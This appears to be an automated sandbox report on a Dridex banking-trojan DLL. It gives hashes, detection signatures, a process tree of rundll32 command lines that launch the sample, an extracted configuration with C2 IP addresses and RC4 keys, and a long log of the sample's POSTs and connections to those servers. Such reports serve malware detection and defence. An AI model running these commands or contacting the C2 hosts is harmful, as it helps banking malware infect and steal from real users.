Windows Analysis Report SecuriteInfo.com.Variant.Razy.980776.8232.19927

Overview

General Information

Sample Name: SecuriteInfo.com.Variant.Razy.980776.8232.19927 (renamed file extension from 19927 to dll)
Analysis ID: 510689
MD5: 6df0687582c592e9860683a68858e082
SHA1: 53780def0699c055381746ce4ecebef8f17fd12d
SHA256: 90877ec621cc53fc31e693362e3b335a429aecc77abdbfd8b7d5d7493478f36d
Tags: dll

Detection

Dridex
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Dridex unpacked file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Detected Dridex e-Banking trojan
Found potential dummy code loops (likely to delay analysis)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Program does not show much activity (idle)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6384 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6396 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6424 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6408 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Bluewing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6464 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Earth MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6480 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Masterjust MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000003.467247040.0000000004B00000.00000040.00000001.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
00000002.00000003.433688939.0000000004C00000.00000040.00000001.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
00000000.00000002.888568308.000000006EFE1000.00000020.00020000.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
00000000.00000003.478698643.0000000001270000.00000040.00000001.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
00000003.00000002.898148863.000000006EFE1000.00000020.00020000.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
(2 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
3.3.rundll32.exe.62db55.0.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
5.3.rundll32.exe.dfdb55.0.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
2.3.rundll32.exe.4c1db55.0.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
4.3.rundll32.exe.4b1db55.0.raw.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
3.3.rundll32.exe.62db55.0.raw.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
(7 further entries not shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 3.2.rundll32.exe.6efe0000.0.unpack | Malware Configuration Extractor: Dridex {"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Variant.Razy.980776.8232.dll | ReversingLabs: Detection: 18%
Source: SecuriteInfo.com.Variant.Razy.980776.8232.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: unknown | HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.6:49747 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.6:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.6:50129 version: TLS 1.2
Source: SecuriteInfo.com.Variant.Razy.980776.8232.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000000.00000002.906753270.000000006F0A7000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.905694712.000000006F0A7000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.8232.dll
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6F00CEF8 FindFirstFileExW,

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 45.77.0.96 235
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.56.219.47 180
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 192.46.210.220 187
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 143.244.140.214 40
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | IPs: 192.46.210.220:443
Source: Malware configuration extractor | IPs: 143.244.140.214:808
Source: Malware configuration extractor | IPs: 45.77.0.96:6891
Source: Malware configuration extractor | IPs: 185.56.219.47:8116
Source: Joe Sandbox View | ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View | ASN Name: KELIWEBIT KELIWEBIT
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1; Host: 192.46.210.220; Content-Length: 4862; Connection: Close; Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1; Host: 192.46.210.220; Content-Length: 4850; Connection: Close; Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 45.77.0.96 45.77.0.96
Source: Joe Sandbox View | IP Address: 185.56.219.47 185.56.219.47
Source: global traffic | TCP traffic: 192.168.2.6:49748 -> 143.244.140.214:808
Source: global traffic | TCP traffic: 192.168.2.6:49750 -> 45.77.0.96:6891
Source: global traffic | TCP traffic: 192.168.2.6:49755 -> 185.56.219.47:8116
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50182 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:57:59 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:02 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:05 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:07 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:09 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:11 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:13 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:15 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:17 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:19 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:21 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:23 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:25 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:28 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:29 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:32 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:33 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:36 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:37 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:40 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:41 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:44 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:46 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:48 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:50 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:52 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:54 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:55 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:58 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:58:59 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:02 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:03 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:06 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:07 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:09 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:11 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:13 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:15 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:17 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:18 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:21 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:22 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:25 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:26 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:29 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:30 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:35 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:35 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:39 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:39 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:43 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:43 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:46 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:47 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:50 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:50 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:54 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:54 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:58 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 02:59:58 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:02 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:02 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:06 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:07 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:10 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:11 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:14 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:15 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:18 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:19 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:22 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:23 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:26 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:27 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:30 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:31 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:33 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:35 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:37 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:39 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:41 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:00:43 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
